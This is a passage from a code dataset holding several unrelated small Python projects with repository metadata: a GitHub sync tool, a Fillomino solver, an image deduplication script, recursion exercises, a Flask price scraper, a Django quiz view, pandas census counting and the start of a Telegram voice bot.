\"_data/OEC_old/\"), encoding=\"utf8\")\n            file_new = open(next_file, encoding=\"utf8\")\n            if file_old.read() != file_new.read():\n                result.append((next_file, \"Modified\"))\n            file_old.close()\n            file_new.close()\n\n        except FileNotFoundError:\n            result.append((next_file, \"Added\"))\n    return result\n\n\ndef accept(file):\n    shutil.copy2(file, \"_data/accepted/\")\n\n\ndef create_pull_request(token):\n    push_list = glob.glob(\"_data/accepted/*.xml\")\n    updated_list = []\n\n    def process_push(next_file, destination):\n        file = open(next_file, encoding=\"utf8\")\n        content = file.read()\n        try:\n            github.push_file(destination, \"Update \" + next_file.split(\"/\")[-1], content, 
token)\n        except IndexError:\n            pass\n        else:\n            updated_list.append(next_file.split(\"/\")[-1])\n        file.close()\n\n    for next_xml in push_list:\n        process_push(next_xml, \"systems/\" + next_xml.split(\"/\")[-1])\n\n    print(\"\\nDone.\", flush=True)\n\n    print(\"Creating pull request... \", end=\"\", flush=True)\n    try:\n        pr = github.create_pull_request(\"[ONE Syncr] Update exoplanet systems\", token)\n        pr_number = \"/\" + str(pr.number)\n    except github.github3.models.GitHubError:\n        pr_number = \"s/\"\n        print(\"Pull request already exists.\", flush=True)\n    else:\n        print(\"Done.\", flush=True)\n\n    pr_url = \"https://github.com/\" + github.TARGET_USERNAME + \"/open_exoplanet_catalogue/pull\" + pr_number\n    return pr_url\n\n\ndef send_email(token, updated_list, pr_url):\n    gh = login(token=token)\n    user = gh.user()\n\n    if user.email:\n        print(\"Sending notification email... \", end=\"\", flush=True)\n\n        email_receiver = user.name + \" <\" + user.email + \">\"\n        body = \"Hi there,\\n\\nThe following files were updated:\\n\\n\"\n        for next_file in updated_list:\n            body += \"\\t\" + next_file + \"\\n\"\n\n        body += \"\\nA pull request has been created: \" + pr_url + \"\\n\"\n        mail.send_email(mail.EMAIL_SENDER,\n                        email_receiver,\n                        \"Update to Open Exoplanet Catalogue\",\n                        body)\n        print(\"An email was sent to \" + email_receiver, flush=True)\n    else:\n        print(\"Public email not set on GitHub.\", flush=True)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"A-Kun/onesyncr-for-oec","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7932445874","text":"\"\"\"This module finds a solution for the given field and raises an exception\nif no solution exists\"\"\"\n\nimport argparse\nimport classes\nimport copy\nimport pickle\nimport queue\nimport sys\nfrom multiprocessing import Pool\n\n\ndef solve(field_to_solve):\n    \"\"\"Finds the solution\"\"\"\n    if field_to_solve.cells_with_number is None or field_to_solve.areas:\n        raise ValueError\n    cells_without_numbers = select_cells_zones_without_numbers(field_to_solve)\n    with Pool(5) as p:\n        for area in cells_without_numbers:\n            a = p.apply_async(task_for_worker,\n                              args=(field_to_solve, area,\n                                    max(field_to_solve\n                                        .cells_with_number.values()) +\n                                    1)).get()\n            if a is None:\n                print(area)\n                continue\n            for c in a.cells:\n                field_to_solve.cells[c.layer][c.place] = c\n    total_areas = select_areas(field_to_solve)\n    if total_areas is None:\n        raise ValueError(\"We can't solve\")\n    field_to_solve.set_areas(total_areas)\n    return field_to_solve\n\n\ndef task_for_worker(f, area, n):\n    for figure in get_next_figure(area, set(), 0, n):\n        areas = select_areas(f)\n        if areas is not None:\n            return figure\n\n\ndef select_cells_zones_without_numbers(f: classes.Field):\n    \"\"\"Returns all connected regions of empty cells in\n    descending order of region size\"\"\"\n    cells_without_number = []\n    visited = set()\n    n = f.n\n    for i in range(n):\n        for j in range(i * 2 + 1):\n            cell = f.cells[i][j]\n            if cell.number == 0 and cell not in visited:\n                cells_without_number.append(select_area(visited, f, cell))\n    cells_without_number_sorted = sorted(cells_without_number,\n                                         key=lambda area: len(area),\n                                         reverse=True)\n    return cells_without_number_sorted\n\n\ndef check_if_ok(areas, cells_with_number, figure):\n    \"\"\"Checks that the figure zone does not conflict\n    with other zones that have already been placed\"\"\"\n    for area in areas:\n        cells = set(area.cells)\n        for cell in 
figure:\n            if cell in cells:\n                return False\n    count = 0\n    for cell in figure:\n        if cell in cells_with_number:\n            count += 1\n    if count == 0:\n        return False\n    return True\n\n\ndef select_areas(f):\n    \"\"\"Marks out the zones on the field, if that is possible\"\"\"\n    n = f.n\n    areas = []\n    visited_cells = set()\n    for i in range(n):\n        for j in range(i * 2 + 1):\n            cell = f.cells[i][j]\n            if cell in visited_cells:\n                continue\n            visited_cells.add(cell)\n            if cell.number == 0:\n                continue\n            number = cell.number\n            current_area = classes.Area()\n            empty_neibs = 0\n            current_area.add_cell(cell)\n            open_area = True\n            index = 0\n            while open_area and index < len(current_area.cells):\n                x = current_area.cells[index].layer\n                y = current_area.cells[index].place\n                index += 1\n                open_area = False\n                for di, dj in classes.direction_dictionary.values():\n                    if (x + di < 0 or x + di >= n or\n                            y + dj < 0 or y + dj >= 2 * (x + di) + 1):\n                        continue\n                    new_cell = f.cells[x + di][y + dj]\n                    if new_cell in visited_cells:\n                        continue\n                    if new_cell.number == 0:\n                        empty_neibs += 1\n                    if new_cell.number == number:\n                        current_area.add_cell(new_cell)\n                        visited_cells.add(new_cell)\n                        open_area = True\n            if ((len(current_area) == number or\n                    empty_neibs > 0 and\n                    len(current_area) + empty_neibs <= number) and\n                    check_if_ok(areas, set(f.cells_with_number.keys()),\n                                current_area.cells)):\n                areas.append(current_area)\n            else:\n                return None\n    return areas\n\n\ndef select_area(visited, f, cell):\n    \"\"\"Selects a connected region of empty cells\"\"\"\n    area = classes.Area()\n    n = f.n\n    area.add_cell(cell)\n    cells_for_check = queue.Queue()\n    cells_for_check.put(cell)\n    visited.add(cell)\n    while not cells_for_check.empty():\n        c = cells_for_check.get()\n        x = c.layer\n        y = c.place\n        for di, dj in classes.direction_dictionary.values():\n            if (x + di < 0 or x + di >= n or\n                    y + dj < 0 or y + dj >= 2 * (x + di) + 1):\n                continue\n            new_cell = f.cells[x + di][y + dj]\n            if new_cell in visited:\n                continue\n            if new_cell.number == 0:\n                area.add_cell(new_cell)\n                visited.add(new_cell)\n                cells_for_check.put(new_cell)\n    return area\n\n\ndef get_next_figure(area, cells_with_number, x, n):\n    \"\"\"Places numbers in the empty cells\"\"\"\n    if len(area) <= x:\n        yield area\n    elif area.cells[x] in cells_with_number:\n        yield from get_next_figure(area, cells_with_number, x + 1, n)\n    else:\n        cell = area.cells[x]\n        cells_with_number.add(cell)\n        for index in range(1, n):\n            cell.set_number(index)\n            yield from get_next_figure(area,\n                                       copy.deepcopy(cells_with_number),\n                                       x + 1, n)\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description='''Finds a solution for the\n    given field and raises an exception if no solution exists;\n    takes the puzzle as input''')\n    field = pickle.loads(sys.stdin.read().encode())\n    sys.stdout.buffer.write(pickle.dumps(solve(field), 0))\n","repo_name":"Mefoolyhi/Fillomino","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9115693546","text":"import os,sys,hashlib,glob,logging.handlers,shutil,time,configparser\n\ndef get_dirname(string):\n    return os.path.dirname(string)\n\ndef init_log(logfile):\n    logging.basicConfig(filename=logfile,level=logging.DEBUG, encoding=\"utf-8\")\n\ndef write_log(msg):\n    timestr = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))\n    logmsg = \"%s\\t%s\" % (timestr , msg)\n    print(logmsg)\n    logging.info(logmsg)\n\ndef sumfile(fobj):\n    m = 
hashlib.md5()\n while True:\n d = fobj.read(8096)\n if not d:\n break\n m.update(d)\n return m.hexdigest()\n\n#get md5sum of file\ndef md5sum(fname): \n if fname == '-':\n ret = sumfile(sys.stdin)\n else:\n #try:\n f = open(fname, 'rb')\n #except:\n #write_log(\"FATAL: Failed to open file [%s]\" % fname)\n ret = sumfile(f)+\"-\"+str(os.path.getsize(fname))\n f.close()\n return ret\n\n#load garbage dict\ndef load_garbage_dict(dirname, garbage_dict):\n for item in os.listdir(dirname):\n subpath = os.path.join(dirname, item)\n if os.path.isdir(subpath):\n load_garbage_dict(subpath, garbage_dict)\n elif os.path.isfile(subpath):\n md5value=md5sum(subpath)\n garbage_dict[md5value]=subpath\n write_log(\"md5value[%s]\\tfile[%s]\" %(md5value, subpath))\n\n#get md5sum of msg\ndef md5sum_msg(msg):\n m = hashlib.md5()\n m.update(msg.encode())\n return m.hexdigest()\n\n#get md5sum for dir message(files' name and length, exclude html and txt)\ndef gen_dir_md5sum(dirname):\n dir_msg=\"\"\n for item in os.listdir(dirname):\n subpath = os.path.join(dirname, item)\n if os.path.isfile(subpath):\n subfix = os.path.splitext(subpath)[1][1:].lower()\n if subfix == \"html\" or subfix==\"txt\" or subfix==\"db\" or subfix==\"torrent\":\n continue\n dir_msg+=(\"%s\\t%d\\t\" % (item, os.path.getsize(subpath)))\n return md5sum_msg(dir_msg)\n\n#build the digest for dir\ndef build_dir_msg(dirname, subpath, dirsum):\n fp=open(subpath, \"w\", encoding=\"utf-8\")\n fp.write(\"%s\\n\" % dirsum)\n for item in os.listdir(dirname):\n subpath = os.path.join(dirname, item)\n if os.path.isfile(subpath):\n subfix = os.path.splitext(subpath)[1][1:].lower()\n if subfix == \"html\" or subfix==\"txt\" or subfix==\"db\" or subfix==\"torrent\":\n continue\n md5value=md5sum(subpath)\n #print(subpath)\n fp.write(\"%s\\t%s\\n\" % (item, md5value))\n fp.write(\"END\\n\")\n fp.close()\n\n#check if digest for dir changes, include files'name file's length\ndef if_dir_change(subpath, dirsum):\n fp=open(subpath, \"r\", encoding=\"utf-8\")\n line_list=fp.readlines()\n fp.close()\n line_num=len(line_list)\n if line_num < 2:\n write_log(\"FATAL\\tdirsum file[%s] format error\" % subpath)\n return True\n if line_num > 0:\n if line_list[0].replace(\"\\n\",\"\") != dirsum:\n write_log(\"dirsum file[%s] changed, rebuild it\" % subpath)\n return True\n elif line_list[line_num-1].replace(\"\\n\",\"\") != \"END\":\n write_log(\"dirsum file[%s] no END, rebuild it\" % subpath)\n return True\n else:\n write_log(\"dirsum file[%s] no line, rebuild it\" % subpath)\n return True\n\n#read the digest file for dir to append to file list\ndef read_filelist(subpath, filelist):\n dirname=get_dirname(subpath)\n fp=open(subpath, \"r\", encoding=\"utf-8\")\n line_list=fp.readlines()\n fp.close()\n line_num=len(line_list)\n if line_num < 2:\n write_log(\"FATAL\\tdirsum file[%s] format error\" % subpath)\n return\n for i in range(1,line_num-1):\n line_array=line_list[i].replace(\"\\n\",\"\").split(\"\\t\")\n if len(line_array) !=2:\n write_log(\"FATAL\\tdirsum file[%s] line%d[%s] format error\" % (subpath, i, line_list[i]))\n continue\n fname=os.path.join(dirname, line_array[0])\n md5value=line_array[1]\n filelist.append([fname, md5value])\n\n#calculate the total valid file(exclude en and txt) number\ndef total_dir(dirname):\n number=0\n for item in os.listdir(dirname):\n subpath = os.path.join(dirname, item)\n try:\n if os.path.isdir(subpath):\n number+=total_dir(subpath)\n elif os.path.isfile(subpath):\n subfix = os.path.splitext(subpath)[1][1:].lower()\n \n if subfix == 
\"html\" or subfix==\"txt\" or subfix==\"db\" or subfix==\"torrent\":\n continue\n number+=1\n except Exception as ex:\n continue\n return number\n\n#check dir recursive\ndef check_dir(dirname, filelist,totalnum):\n if_has_son_dir=False\n #print(dirname)\n #try:\n if True:\n for item in os.listdir(dirname):\n subpath = os.path.join(dirname, item)\n #print(subpath)\n if os.path.isdir(subpath):\n if_has_son_dir=True\n #print(if_has_son_dir)\n check_dir(subpath, filelist, totalnum)\n #print(if_has_son_dir)\n #if not if_has_son_dir:\n if True:\n dirsum=gen_dir_md5sum(dirname)\n subpath = os.path.join(dirname, \"dirsum.txt\")\n print(subpath)\n if not os.path.exists(subpath):\n print(subpath)\n write_log(\"dirsum file[%s] not exist, create it\" % subpath)\n build_dir_msg(dirname, subpath, dirsum)\n elif if_dir_change(subpath, dirsum): \n build_dir_msg(dirname, subpath, dirsum)\n read_filelist(subpath, filelist)\n write_log(\"total: %d\\tcurrent: %d\" % (totalnum, len(filelist)))\n #except Exception as ex:\n # pass\n #print(dirname)\n\n#mv file to dst dir\ndef mv_file(src_dir, dst_dir, oldpic, similarpic):\n newpic = dst_dir+oldpic[len(src_dir):]\n if not os.path.exists(oldpic):\n write_log(\"FATAL: file [%s] not exist!\" % oldpic)\n return\n newdir=get_dirname(newpic)\n try:\n if not os.path.exists(newdir):\n os.makedirs(newdir)\n except Exception as ex:\n pass\n try:\n shutil.move(oldpic, newpic)\n except Exception as ex:\n pass\n write_log(\"move\\n%s\\nto\\n%s\\nsimilar to\\n%s\\n######################################\" % (oldpic, newpic, similarpic))\n\ndef del_repeat_and_garbage(root_dir, file_list, garbage_dict, garbage_dir, repeatfile_dir, dir_dict):\n #record the change directory, for recreate dirsum for these directorys\n change_dir_dict={}\n total_file_num=len(file_list)\n for i in range(total_file_num):\n if i % 10000 == 0:\n write_log(\"del_repeat_and_garbage total: %d\\tcurrent: %d\" %(total_file_num, i))\n #file name\n fname=file_list[i][0]\n #directory name\n dname=get_dirname(fname)\n #if dirname not in dir dict, then build a file dict insert into dir_dict\n if dname not in dir_dict:\n file_dict={}\n dir_dict[dname]=file_dict\n #file md5 value\n md5value=file_list[i][1]\n #if file is a garbage\n if md5value in garbage_dict:\n change_dir_dict[dname]=0\n mv_file(root_dir, garbage_dir, fname, garbage_dict[md5value])\n #if file in file dict\n elif md5value in dir_dict[dname]:\n change_dir_dict[dname]=0\n mv_file(root_dir, repeatfile_dir, fname, dir_dict[dname][md5value])\n #insert into dir dict\n else:\n dir_dict[dname][md5value]=fname\n #walk on all the change directorys, to recreate dirsum\n total_dir_num=len(change_dir_dict)\n x=0\n for dirname in change_dir_dict:\n if x % 10 == 0:\n write_log(\"rebuild_dirsum total: %d\\tcurrent: %d\" %(total_dir_num, x))\n x+=1\n dirsum=gen_dir_md5sum(dirname)\n subpath = os.path.join(dirname, \"dirsum.txt\")\n if not os.path.exists(subpath):\n write_log(\"dirsum file[%s] not exist, create it\" % subpath)\n build_dir_msg(dirname, subpath, dirsum)\n elif if_dir_change(subpath, dirsum):\n build_dir_msg(dirname, subpath, dirsum)\n\n#output the filelist and md5values to result file\ndef output_dir2(dir_dict, result_file):\n fi= open(result_file, \"w\", encoding=\"utf-8\")\n for d in dir_dict:\n for md5value in dir_dict[d]:\n fi.write(\"%s\\t%s\\n\" % (dir_dict[d][md5value], md5value))\n fi.close()\n\ndef get_md5value():\n g_garbage_dict={}\n g_file_list=[]\n g_dir_dict={}\n cf = configparser.ConfigParser()\n cf.read(\"config.conf\")\n 
g_log_file=cf.get(\"del_reapeat\", \"LOG_FILE\")\n init_log(g_log_file)\n write_log(\"PROGRAM BEGIN\")\n g_garbage_dir=cf.get(\"del_reapeat\",\"GARBAGE_FILES_DIR\")\n g_target_dir=cf.get(\"global\", \"TARGET_DIR\")\n g_result_file=cf.get(\"del_reapeat\", \"MD5VALUE_RESULT\")\n timestr = time.strftime('%Y%m%d-%H%M',time.localtime(time.time()))\n g_garbage_res_dir=os.path.join(get_dirname(g_target_dir), \"garbagefile_%s\\\\\" % timestr)\n g_repeatfile_res_dir=os.path.join(get_dirname(g_target_dir), \"repeatfile_%s\\\\\" % timestr)\n g_target_dir+=\"\\\\\"\n g_target_dir = g_target_dir\n g_garbage_dir = g_garbage_dir\n g_garbage_res_dir = (g_garbage_res_dir)\n g_repeatfile_res_dir = (g_repeatfile_res_dir)\n g_result_file = (g_result_file)\n write_log(\"garbage dir: %s\" % g_garbage_dir)\n write_log(\"target dir: %s\" % g_target_dir)\n write_log(\"md5value result file: %s\" % g_result_file)\n write_log(\"load_garbage_dict...\")\n load_garbage_dict(g_garbage_dir, g_garbage_dict)\n write_log(\"load_garbage_dict end\")\n write_log(\"total garbage files: %d\" % len(g_garbage_dict))\n write_log(\"total_dir...\")\n #x = raw_input(\"total picture number:\\n\")\n #if x==\"\":\n # g_totalnum=total_dir(g_target_dir)\n #else:\n # g_totalnum=int(x)\n g_totalnum=total_dir(g_target_dir)\n write_log(\"total_dir end\")\n write_log(\"total_number:%d\" % g_totalnum)\n write_log(\"check_dir...\")\n check_dir(g_target_dir, g_file_list, g_totalnum)\n write_log(\"check_dir end\")\n write_log(\"del_repeat_and_garbage...\")\n del_repeat_and_garbage(g_target_dir, g_file_list, g_garbage_dict, g_garbage_res_dir, g_repeatfile_res_dir, g_dir_dict)\n write_log(\"del_repeat_and_garbage end\")\n write_log(\"output_dir...\")\n output_dir2(g_dir_dict, g_result_file)\n write_log(\"output_dir end\")\n write_log(\"PROGRAM END\")\n\ndef load_md5value_file(input_file, dir_dict, pic_dict):\n fp=open(input_file, \"r\", encoding=\"utf-8\")\n picno=0\n for line in fp.readlines():\n line_array=line.split(\"\\t\")\n filename=line_array[0]\n md5value=line_array[1].replace(\"\\n\",\"\")\n dirname=get_dirname(filename)\n #print filename\n #print md5value\n #print dirname\n if (dirname not in dir_dict):\n #if not os.path.isdir(dirname):\n # write_log(\"FATAL\\tfile[%s]'s path[%s] is not a directory\" % (filename, dirname))\n # continue\n subdir_dict={}\n subdir_dict[filename]=md5value\n dir_dict[dirname]=subdir_dict\n else:\n dir_dict[dirname][filename]=md5value\n\n if (md5value not in pic_dict):\n dirs_dict={}\n dirs_dict[dirname]= 1\n pic_dict[md5value]=dirs_dict\n else:\n pic_dict[md5value][dirname]=1\n picno+=1\n write_log(\"total input pictures: %d\" % picno)\n\ndef get_father(dir_dict, pic_dict, father_dict, target_dir):\n for d in dir_dict:\n if target_dir != d[:len(target_dir)]:\n continue\n temp_dict={}\n #walk on all the files of folder d to build the dict for the union of all the files' folders\n for f in dir_dict[d]:\n for x in pic_dict[dir_dict[d][f]]:\n if x not in temp_dict:\n temp_dict[x] = 1\n else:\n temp_dict[x]= temp_dict[x] + 1\n #walk on temp_dict to build son and father relation\n for item in temp_dict:\n i = item\n #get d's father and make ture d's father is not itself\n if (temp_dict[i] == len(dir_dict[d])) and (d != i):\n #if i's father already is d, then don't mark d's father be i\n if (i in father_dict) and (father_dict[i] == d):\n write_log(\"brothers\\t%s\\t%s\" % (d, i))\n continue\n write_log(\"get_father\\t%s\\t%s\" % (d, i))\n #if i has father and not be d, then mark i be i's father\n if (i in 
father_dict):\n write_log(\"rep_grandpa\\t%s\\t%s\" % (i, father_dict[i]))\n i=father_dict[i]\n #replace the father of d's son\n for y in father_dict:\n if father_dict[y] == d:\n father_dict[y]=i\n write_log(\"rep_father\\t%s\\tfather\\tfrom\\t%s\\tto\\t%s\" % (y, d, i))\n #replace the father of d\n father_dict[d]=i\n break\n temp_dict.clear()\n\ndef output_relation(father_dict, output_file):\n fi= open(output_file, \"w\", encoding=\"utf-8\")\n for d in father_dict:\n fi.write(\"%s\\t%s\\n\" % (d, father_dict[d]))\n fi.close()\n\n#output the filelist and md5values to result file\ndef output_dir3(dir_dict, father_dict, result_file):\n fi= open(result_file, \"w\", encoding=\"utf-8\")\n picno=0\n for d in dir_dict:\n if d not in father_dict:\n for f in dir_dict[d]:\n picno+=1\n fi.write(\"%s\\t%s\\n\" % (f, dir_dict[d][f]))\n fi.close()\n write_log(\"total output pictures: %d\" % picno)\n\ndef get_father_relation():\n g_dir_dict={}\n g_pic_dict={}\n g_father_dict={}\n cf = configparser.ConfigParser()\n cf.read(\"config.conf\")\n g_log_file=cf.get(\"del_reapeat\", \"LOG_FILE\")\n init_log(g_log_file)\n write_log(\"PROGRAM BEGIN\")\n g_target_dir=cf.get(\"global\", \"TARGET_DIR\")\n g_input_file_base=cf.get(\"del_reapeat\", \"BASE_MD5VALUE_RESULT\")\n g_input_file=cf.get(\"del_reapeat\", \"MD5VALUE_RESULT\")\n g_output_file=cf.get(\"del_reapeat\", \"FATHER_RELATION\")\n g_target_dir+=\"\\\\\"\n g_target_dir = (g_target_dir)\n g_input_file = (g_input_file)\n g_output_file = (g_output_file)\n write_log(\"md5value result: %s\" % g_input_file)\n write_log(\"father relation: %s\" % g_output_file)\n write_log(\"load_md5value_file...\")\n load_md5value_file(g_input_file, g_dir_dict, g_pic_dict)\n write_log(\"load_md5value_file end\")\n if os.path.exists(g_input_file_base):\n write_log(\"load_md5value_base_file...\")\n load_md5value_file(g_input_file_base, g_dir_dict, g_pic_dict)\n write_log(\"load_md5value_base_file end\")\n write_log(\"get_father...\")\n get_father(g_dir_dict, g_pic_dict, g_father_dict, g_target_dir)\n write_log(\"get_father end\")\n write_log(\"output_relation...\")\n output_relation(g_father_dict, g_output_file)\n write_log(\"output_relation end\")\n write_log(\"output_dir...\")\n output_dir3(g_dir_dict, g_father_dict, g_input_file+\"_new.txt\")\n write_log(\"output_dir end\")\n write_log(\"PROGRAM END\")\n\ndef disposal_file(input_file, father_dict):\n fp=open(input_file, \"r\", encoding=\"utf-8\")\n for line in fp.readlines():\n line_array=line.split(\"\\t\")\n sonname=line_array[0]\n fathername=line_array[1].replace(\"\\n\",\"\")\n father_dict[sonname]=fathername\n\ndef mv_dir(src_dir, dst_dir, father_dict):\n for olddir in father_dict:\n has_son_dir = False\n for item in os.listdir(olddir):\n subpath = os.path.join(olddir, item)\n if os.path.isdir(subpath):\n has_son_dir = True\n break\n #if has_son_dir:\n # continue\n newdir = dst_dir+olddir[len(src_dir):]\n if not os.path.exists(newdir):\n #write_log(\"makedir[%s]\" % newdir)\n try:\n os.makedirs(newdir)\n except Exception as ex:\n pass\n for item in os.listdir(olddir):\n oldpath=os.path.join(olddir,item)\n if os.path.isdir(oldpath):\n continue\n newpath=os.path.join(newdir,item)\n #write_log(\"src[%s] dst[%s]\" % (oldpath, newpath))\n try:\n shutil.move(oldpath, newpath)\n except Exception as ex:\n pass\n if not has_son_dir and len(os.listdir(olddir))==0:\n os.rmdir(olddir)\n write_log(\"final_father src\\n%s\\n new\\n%s\\n father\\n%s\\n######################################\" % (olddir, newdir, father_dict[olddir]))\n\ndef 
mv_repeat():\n g_father_dict={}\n cf = configparser.ConfigParser()\n cf.read(\"config.conf\")\n g_log_file=cf.get(\"del_reapeat\", \"LOG_FILE\")\n init_log(g_log_file)\n write_log(\"PROGRAM BEGIN\")\n g_target_dir=cf.get(\"global\", \"TARGET_DIR\")\n g_input_file=cf.get(\"del_reapeat\", \"FATHER_RELATION\")\n timestr = time.strftime('%Y%m%d-%H%M',time.localtime(time.time()))\n g_result_dir=os.path.join(os.path.dirname(g_target_dir), \"repeatdir_%s\\\\\" % timestr)\n g_target_dir+=\"\\\\\"\n g_target_dir = (g_target_dir)\n g_result_dir = (g_result_dir)\n g_input_file = (g_input_file)\n write_log(\"father relation file: %s\" % g_input_file)\n write_log(\"target dir: %s\" % g_target_dir)\n write_log(\"result dir: %s\" % g_result_dir)\n write_log(\"disposal_file...\")\n disposal_file(g_input_file, g_father_dict)\n write_log(\"disposal_file end\")\n write_log(\"mv_dir...\")\n mv_dir(g_target_dir, g_result_dir, g_father_dict)\n write_log(\"mv dir end\")\n write_log(\"PROGRAM END\")\n\nget_md5value()\nget_father_relation()\nmv_repeat()\n","repo_name":"yangkai04/picture_disposal","sub_path":"del_repeat.py","file_name":"del_repeat.py","file_ext":"py","file_size_in_byte":17679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30893868921","text":"def sumarRecursivamente(numeroASumarRecursivamente):\n if numeroASumarRecursivamente <=0:\n return 0\n \n return numeroASumarRecursivamente + sumarRecursivamente(numeroASumarRecursivamente-1)\n\ndef factorialRecursivo(numeroABuscarFactorial):\n if numeroABuscarFactorial == 0:\n return 1\n \n return numeroABuscarFactorial * factorialRecursivo(numeroABuscarFactorial-1)\n\n\ndef potenciaRecursiva(numeroAPotenciar, potenciaDeseada):\n if potenciaDeseada == 0:\n return 1\n \n return numeroAPotenciar * potenciaRecursiva(numeroAPotenciar,potenciaDeseada-1)\n\n\nif __name__ == '__main__':\n while True:\n print(''' \n \n Opciones del Menu \n \n S[U]ma Recursiva\n [P]otencia\n [F]actorial\n [S]alir\n ''')\n \n comando = input ('Digite la opcion deseada: ').lower()\n try:\n if comando == 'u':\n numeroASumarRecursivamente = int(input('Ingrese el Numero Entero a Sumar Recurivamente: ')) \n resultadoSumaRecursiva = sumarRecursivamente(numeroASumarRecursivamente)\n print('La suma recursiva del numero {} es: {}'.format(numeroASumarRecursivamente,resultadoSumaRecursiva))\n elif comando == 'p':\n datosSolicitadosParaLaPotencia = input('Ingrese el Numero y su Potencia separados por \",\": ')\n listaParametros = datosSolicitadosParaLaPotencia.split(\",\")\n resultadoPotencia = potenciaRecursiva(int(listaParametros[0]),int(listaParametros[1]))\n print('La potencia del numero {} a la {} es: {}'.format(listaParametros[0],listaParametros[1],resultadoPotencia))\n elif comando == 'f':\n numeroABuscarFactorial = int(input('Ingrese el Numero Entero que desee buscar su Factorial: '))\n resultadoFactorial = factorialRecursivo(numeroABuscarFactorial)\n print('El factorial del numero {} es: {}'.format(numeroABuscarFactorial,resultadoFactorial))\n\n elif comando == 's':\n break\n except ValueError:\n print(\"Ingreso Invalido, por favor digite un numero Entero positivo\")\n \n\n \n","repo_name":"jrperez175/Python","sub_path":"Recursividad/recursividadAplicada.py","file_name":"recursividadAplicada.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21032162138","text":"import requests\nimport json\nfrom bs4 import 
BeautifulSoup\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/price\", methods=[\"GET\", \"POST\"])\ndef get_product_price():\n data = request.get_json()\n product_url = data.get(\"url\")\n\n if product_url:\n price = scrape_product_price(product_url)\n return jsonify({\"price\": price})\n else:\n return jsonify({\"error\": \"Invalid request\"}), 400\n\n\ndef scrape_product_price(product_url):\n response = requests.get(product_url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n detail_container = soup.find(\"div\", id=\"detail-container\")\n google_product_data = detail_container.get(\"data-googleproduct\", {})\n product_price = \"\"\n if google_product_data:\n product_data = json.loads(google_product_data)\n product_price = product_data.get(\"price\", \"\")\n\n return product_price\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"cheunyinz/react-dashboard","sub_path":"crawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74966440856","text":"from django.views.generic import ListView\n\nfrom cultures.models import Culture\n\nfrom quizzes.models import Question, Answer\n\n\nclass QuizView(ListView):\n\n model = Question\n context_object_name = 'questions'\n template_name = 'quiz.html'\n\n def get_queryset(self):\n questions = Question.objects.filter(\n culture=Culture.objects.get(name__icontains=self.kwargs['name'])\n )\n return questions\n\n def get_context_data(self, **kwargs):\n context = super(QuizView, self).get_context_data(**kwargs)\n questions = self.get_queryset()\n answers = []\n for q in questions:\n a = Answer.objects.filter(question=q.pk)\n answers.append(a)\n context['answers'] = answers\n print(context)\n return context\n","repo_name":"juanpflores/Hodor","sub_path":"quizzes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23158521056","text":"# #with open(\"./weather_data.csv\") as weather_data:\n# # data=weather_data.readlines()\n# # print(data)\n#\n# # import csv\n# # with open(\"./weather_data.csv\") as weather_data:\n# # data=csv.reader(weather_data)\n# # temps=[]\n# # for row in data:\n# # if row[1]!=\"temp\":\n# # temps.append(int(row[1]))\n# # print(temps)\n#\n# import pandas\n# #total=0\n# data= pandas.read_csv(\"weather_data.csv\")\n# # temp_list=data[\"temp\"].to_list()\n# # for temp in temp_list:\n# # total+=temp\n# # print(total/len(temp_list))\n# # print(data[\"temp\"].mean())\n# # print(data[\"temp\"].max())\n# # print(data[data.temp==data.temp.max()])\n# monday=data[data.day==\"Monday\"]\n# print(monday.temp)\n\n\nimport pandas\ndata=pandas.read_csv(\"2018_Central_Park_Squirrel_Census_-_Squirrel_Data.csv\")\ngreys_count= len(data[data[\"Primary Fur Color\"] == \"Gray\"])\nreds_count= len(data[data[\"Primary Fur Color\"] == \"Cinnamon\"])\nblacks_count= len(data[data[\"Primary Fur Color\"] == \"Black\"])\n\ndata_dict = {\n \"Fur Colour\": [\"Grey\",\"Cinnamon\",\"Black\"],\n \"Count\": [greys_count,reds_count,blacks_count]\n}\ndf = 
pandas.DataFrame(data_dict)\ndf.to_csv(\"squirrel_count.csv\")\n\n\n","repo_name":"Oliwrm/squirrel-data-practice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"1576952408","text":"import asyncio\nimport logging\nimport sys\n\nfrom aiogram import Bot, Dispatcher, Router, types\nfrom aiogram.filters import Command\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.fsm.state import State, StatesGroup\nimport aiohttp\n\nimport cfg\n\nfrom Recognition import Recognition\n\nfrom translate import translate\n\nfrom OpenAI import generate_dialog\n\nform_router = Router()\nbot = Bot(token=cfg.telegramAPI_TOKEN, parse_mode=\"HTML\")\ncontext = \"Hi, how are you today?\"\n\nasync def download_voice_message(voice_message: types.Voice):\n file_info = await bot.get_file(voice_message.file_id)\n file_url = f\"https://api.telegram.org/file/bot{bot.token}/{file_info.file_path}\"\n\n async with aiohttp.ClientSession() as session:\n async with session.get(file_url) as response:\n if response.status == 200:\n file_data = await response.read()\n with open(f'voice.ogg', 'wb') as f:\n f.write(file_data)\n else:\n 